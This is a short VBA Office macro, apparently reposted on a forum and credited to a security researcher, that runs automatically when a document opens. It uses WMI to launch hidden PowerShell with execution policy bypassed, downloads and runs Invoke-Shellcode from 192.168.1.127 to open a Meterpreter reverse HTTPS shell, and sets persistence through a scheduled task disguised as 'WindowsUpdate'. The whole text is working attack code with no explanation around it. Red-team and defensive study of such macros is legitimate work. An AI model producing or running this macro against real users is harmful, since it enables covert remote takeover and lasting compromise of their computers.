- ' Author: Matt Nelson
- ' Twitter: @enigma0x3
- Sub Auto_Open()
- Execute
- Persist
- End Sub
- Public Function Execute() As Variant
- Const HIDDEN_WINDOW = 0
- strComputer = "."
- Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
-
- Set objStartup = objWMIService.Get("Win32_ProcessStartup")
- Set objConfig = objStartup.SpawnInstance_
- objConfig.ShowWindow = HIDDEN_WINDOW
- Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
- objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID
- End Function
-
- Public Function Persist() As Variant
- Const HIDDEN_WINDOW = 0
- strComputer = "."
- Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
-
- Set objStartup = objWMIService.Get("Win32_ProcessStartup")
- Set objConfig = objStartup.SpawnInstance_
- objConfig.ShowWindow = HIDDEN_WINDOW
- Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
- objProcess.Create "Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN WindowsUpdate /TR 'powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c ''IEX ((New-Object Net.WebClient).DownloadString(''''http://192.168.1.127/Invoke-Shellcode''''''))''; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force' /SC onidle /i 20}", Null, objConfig, intProcessID
- End Function
-
|
发表于 2017-4-1 10:43:04
收藏
支持
反对